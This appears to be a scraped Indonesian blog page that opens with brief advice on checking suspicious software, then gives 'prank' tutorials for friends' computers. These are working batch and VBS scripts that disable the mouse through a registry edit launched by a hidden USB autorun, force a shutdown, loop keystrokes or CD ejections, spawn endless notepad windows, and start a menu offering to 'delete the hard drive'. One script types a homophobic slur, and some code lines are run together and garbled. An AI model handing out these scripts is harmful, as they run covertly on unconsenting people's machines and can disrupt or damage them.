Dalam kasus di mana kamu tidak bisa men-scan file mencurigakan dengan software keamanan, cobalah untuk menyelidiki file tersebut dengan bantuan internet. Kasus ini terjadi apabila sebuah website memintamu untuk menginstal sesuatu yang patut diwaspadai. Berikut langkah-langkahnya:

 1. Kumpulkan sebanyak mungkin informasi tentang software yang mencurigakan itu. Catat nama softwarenya dan website yang menawarkannya.
 2. Lakukan pencarian di internet nama software tersebut. Legitimasi dan unsur keamanan dari software itu biasanya akan muncul di hasil pencarian yang pertama muncul. Jika kamu masih ragu-ragu, search lagi namanya dan tambahkan keyword seperti ‘malware’, ‘safe’ atau ‘remove’. Cek juga reputasi dari situs yang memintamu untuk menginstal software itu.


  Pastikan Software Selalu Update :
1. Versi terbaru dari web browser mampu memindai hasil download-an atau memperingatkanmu akan program ‘beracun’, dan memblokir malware yang terdeteksi. Jadi, pastikan kamu selalu rajin meng-update browsermu dengan versi teranyar.
2. Kebanyakan program email akan memindai attachment dari infeksi sebelum kamu mengunduhnya. Perhatikan baik-baik proses ini.

Share:

Sabtu, 18 Februari 2012

Nonaktifkan Mouse Lewat Flask Disk

Disable Your Friend’s Mouse Whenever USB Disk Is Inserted.


Steps:-
1. Open the notepad file

2. Just copy and paste the below code in your notepad file. . .

@echooffsetkey="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"regdelete%key%regadd %key% /v Start /t REG_DWORD /d 4

3.Save the file as .bat extension. . .

4.Then create the other notepad file and
Just copy and paste the below code in your notepad file. . .
[autorun]Open=filename.fileextension is batAction=Mouse Disable


you have to put the name .bat which is already done by you. .

5 save the file as autorun.inf

6.Now just copies these two files and paste it in your pen drive. . .And hide these both file . . .Whenever your friend insert your pen drive in his computerThese both files are run automatically. . .and then the mouse will be disable. .
For enabling the Mouse. .
Go to run
Type regedit
Then go to
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\MouclassClick on startAnd modify its value 1 instead of 4. . .
After this the Mouse will enable. . .


kalau anda  ingin yg lain?
bisa diganti kok VBS Script nya !


 Klik Disini !
Share:

Scipt VBS ,Buat Jailin Temen

1).Memberi sedikit pesan dan shutdown komputer teman anda.
Ketik kode:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

- Save As menggunakan Extension .BAT lalu kirim ke teman anda.

Contoh: apasaja.bat




2). Menyalakan tombol Caps lock secara simultan.
Ketik kode:

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

- Save As .VBS terus kirim ke teman anda

Contoh: apasaja.VBS




3). Buka/tutup CD drive secara terus menerus.
Ketik kode:

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

- Save As .VBS terus kirim ke teman anda.



4). Yang ini script fungsinya supaya tekan enter secara simultan.
Ketik kode :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

- Save As .VBS terus kirim ke teman anda.




5). Script ini Fungsinya untuk membuka notepad, kemudian akan mengetik pesan kita secara otomatis di notepad.
Ketik kode:

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

- Save As .VBS terus kirim ke teman anda.



6). Membuat script VBS ini menjalankan BACKSPACE secara simultan.
Ketik Code:

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

- Save As .VBS terus kirim ke teman anda



7). Hack keyboard sehingga temen lu dipaksa ngetik " u are a gay" secara simultan.
Ketik kode:

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a gay"
loop

- Save As .VBS trus kirim ke teman anda




8). Buka Notepad secara terus menerus.
Ketik kode:

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

- Save As .BAT terus kirim ke teman anda



9). Script BAT yang ini bakal munculin 5 pilihan yang harus temen kalian diantaranya adalah:

1. Shutdown
2. Restart
3. Hapus HardDrive
4. Net Send
5. Menampilkan pesan, kemudian shutdown

Ketik kode:

@echo off
title The end of the world
cd C:\
:menu
cls
echo oops gw gak tanggung jawab lho apa yang barusan lu lakuin hehhe,,semuanya dh jadi tanggung jawab lu sendiri...
pause
echo pilih nama cwe yang lu suka =P :
echo 1. datanya bakal ilang lho.
echo 2. komputer nya corrupt lho
echo 3. heheh no comment deh klo yang ini
echo 4. mau mati pake jalan ini?
echo 5. bye bye...
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two


10). Nontaktifkan Mouse

Ketik Kode :

@echooffsetkey="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"regdelete%key%regadd %key% /v Start /t REG_DWORD /d 4



Save Ass,   .Bat Extension
Share: